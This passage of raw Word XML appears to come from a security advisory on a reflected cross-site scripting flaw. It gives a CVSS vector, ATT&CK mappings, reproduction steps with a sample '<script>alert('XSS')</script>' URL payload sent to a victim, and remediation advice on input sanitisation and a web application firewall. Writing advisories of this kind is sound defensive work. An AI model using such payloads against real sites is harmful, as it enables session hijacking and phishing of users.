                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4954AF17">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F0BC92" w14:textId="7EC91E5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5F99C762" w:rsidP="0D325B6E" w:rsidRDefault="5F99C762" w14:paraId="04C6DC60" w14:textId="36A4E84D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="5F99C762">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</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657846E"/>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AE078A2"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4BC22E2C">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97E9464" w14:textId="1C2D8B2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7EB7F90" w14:textId="776B309B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="Rb6a3e5cbd34e4839">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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AT:N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PR:L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UI:A</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VC:L</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VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="25F3297A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>N/VA:N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SC:N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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="13AE2F32">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269D5F" w14:textId="64F2604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D3EDACC" w:rsidP="0D325B6E" w:rsidRDefault="1D3EDACC" w14:paraId="1A26BCE8" w14:textId="6C9AAEBF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="1D3EDACC">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8E190EA" w:rsidP="0D325B6E" w:rsidRDefault="58E190EA" w14:paraId="48D3BCB9" w14:textId="779284D2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R66741c53b4cc4269">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58E190EA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1189</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="716157A3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58E190EA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Drive-by Compromise</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5D8BC131">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3C060BEE"/>
        </w:tc>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46CD52E6" w:rsidP="0D325B6E" w:rsidRDefault="46CD52E6" w14:paraId="5F33F0DF" w14:textId="426881BE">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="46CD52E6">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85F4651" w:rsidP="0D325B6E" w:rsidRDefault="485F4651" w14:paraId="699C9A5C" w14:textId="0C1418D7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R7b0c4c10b668409d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="485F4651">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0818</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7EEF2B73">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="485F4651">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="485F4651">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Validate</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="485F4651">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Program Inputs</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="485F4651" w:rsidP="0D325B6E" w:rsidRDefault="485F4651" w14:paraId="69F7D35D" w14:textId="06E93B66">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re931933b9ea0416b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="485F4651">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1021</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0EB11126">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="485F4651">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Restrict Web-Based Content</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="693C4406">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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12DA6A" w14:textId="671D3205">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7AC66AB" w14:textId="537C9F5E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="79A5B8F4" w14:textId="5FF3B0A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="26D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="0338CA5F" w14:textId="4453952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6D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="34EB0AF2" w14:textId="3638712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craft a malicious URL that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contains</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9448E7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a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JavaScript </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A3122A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</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that will be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reflected</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036A0A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="78A0381B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user's</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browser when they</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lic</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k</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URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3B01EBF1" w14:textId="048EC3E0">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6D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="655C6D4A" w14:textId="65CF9901">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26D42A52">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26D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="6F5B7965" w14:textId="6E915886">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers can abuse this vulnerability to execute arbitrary JavaScript code in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="459193F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A273CB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> browser</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B7D8B16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by distributing malicious links through phishing attempts, social engineering, and compromised websites.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This can be abused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to hijack</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session cookies or </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send</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malicious alerts and messages to other users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0EAC0FE7" w14:textId="03BD436E">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26D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="14102FB5" w14:textId="42A2DF10">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6D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="3CF21022" w14:textId="64AD763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D325B6E" w:rsidR="26D42A52">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w:rsidR="26D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="7A796F9A" w14:textId="5D49A59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26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject a malicious XSS payload into a URL parameter (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://WEBSITE/search?q=&lt;script&gt;alert('XSS')&lt;/script&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="6EDFFC4E" w14:textId="4DFB6FA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Step 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Send the crafted URL to a victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="4B920183" w14:textId="658FEFB2">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r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4: When the victim clicks the malicious URL the script will be executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2AA2AB61" w14:textId="5A2800A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358C3C89" w14:textId="38CEAC17">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6D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="54584BA6" w14:textId="5A64911A">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6D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="70594B94" w14:textId="6ABFBBE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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2929428C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2929428C" w:rsidP="0D325B6E" w:rsidRDefault="2929428C" w14:paraId="0598DFFB" w14:textId="30EA6FC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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2929428C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</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roperly sanitiz</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D864B59">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26D42A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all user input before storing or passing any data to users. Sanitization functions are present in all programming languages that will encapsulate and prevent the execution of any malicious user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D66727B" w:rsidP="0D325B6E" w:rsidRDefault="3D66727B" w14:paraId="42E11E89" w14:textId="52BF5111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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3D66727B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilize a web application </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3D66727B">
        <w:rPr>
